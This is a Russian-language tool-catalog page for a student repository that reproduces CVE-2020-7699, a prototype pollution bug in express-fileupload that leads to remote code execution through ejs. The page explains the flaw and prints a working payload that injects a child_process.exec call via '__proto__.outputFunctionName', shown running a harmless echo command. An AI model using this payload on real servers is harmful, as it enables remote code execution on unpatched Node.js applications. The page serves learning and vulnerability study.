Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-7699_reproduce — Воспроизведение CVE-2020-7699, курсовая работа по курсу «Принципы безопасности программного обеспечения» | Kitploit
Инструменты/GitHubGitHub/zodiac12-pub/cve-2020-7699_reproduce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеРазработка Полезной НагрузкиЛаборатории и Практика
GitHubzodiac12-pub/cve-2020-7699_reproduce

CVE-2020-7699_reproduce

Воспроизведение CVE-2020-7699, курсовая работа по курсу «Принципы безопасности программного обеспечения»

Репозиторий
14 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Воспроизведение CVE-2020-7699

Воспроизведение уязвимости RCE в Node.js (CVE-2020-7699), моя лабораторная работа

Установка

Версия Node.js: v14.16.1, убедитесь, что версия Node.js — 14 (другие версии, вероятно, тоже подойдут, я не тестировал)

Версия Python:3.9.5, Python используется только для отправки HTTP-запроса атаки, конкретная версия не требуется.

Просто clone репозиторий, npm i для установки зависимостей. Я предоставил ещё 2 команды:

  • используйте npm run start-server для запуска целевого сервера (сервера-жертвы)
  • используйте npm run launch-attack для запуска атаки

Анализ

express-fileUpload: версии ниже 1.1.10 уязвимы

В express-fileUpload существует прототип-загрязнение (prototype pollution)

Уязвимость: prototype pollution в express-fileUpload

Как использовать: загрязнить __proto__.outputFunctionName, чтобы записать команду для выполнения. Пример: echo \"ATTACK SUCCESSFUL\" > attacked.txt

root@kitploit:~
exec_command = "echo \"ATTACK SUCCESSFUL\" > attacked.txt"

{
    "__proto__.outputFunctionName": (
        None,
        f"x;process.mainModule.require('child_process').exec('{exec_command}');x"
    )
}

В ejs существует RCE

Уязвимость: ejs попытается выполнить xxx.outputFunctionName, который является undefined, но если object.outputFunctionName загрязнён, он выполнит его вместо этого

Скачать инструмент